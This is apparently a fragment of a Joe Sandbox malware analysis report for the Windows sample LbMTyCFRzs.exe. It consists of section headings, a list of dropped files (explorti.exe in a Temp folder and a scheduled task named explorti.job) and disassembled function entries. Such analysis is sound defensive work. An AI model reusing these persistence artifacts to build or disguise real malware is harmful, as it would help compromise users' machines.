Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe:Zone.Identifier

C:\Windows\Tasks\explorti.job

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Suricata IDS Alerts

Windows Analysis Report
LbMTyCFRzs.exe

Function 0061BD60 Relevance: 24.8, APIs: 5, Strings: 9, Instructions: 310
networkfileCOMMON

Function 00615DF0 Relevance: 12.6, APIs: 2, Strings: 5, Instructions: 364
COMMON

Function 00617D00 Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 392
COMMON

Function 00646E01 Relevance: 4.6, APIs: 3, Instructions: 145
COMMON

Function 006182B0 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 159
COMMON

Function 00626AE0 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 40
sleepCOMMON

Function 00646C99 Relevance: 1.6, APIs: 1, Instructions: 89
COMMON

Function 00646F71 Relevance: 1.6, APIs: 1, Instructions: 56
timeCOMMON

Function 04C00106 Relevance: .1, Instructions: 91
COMMON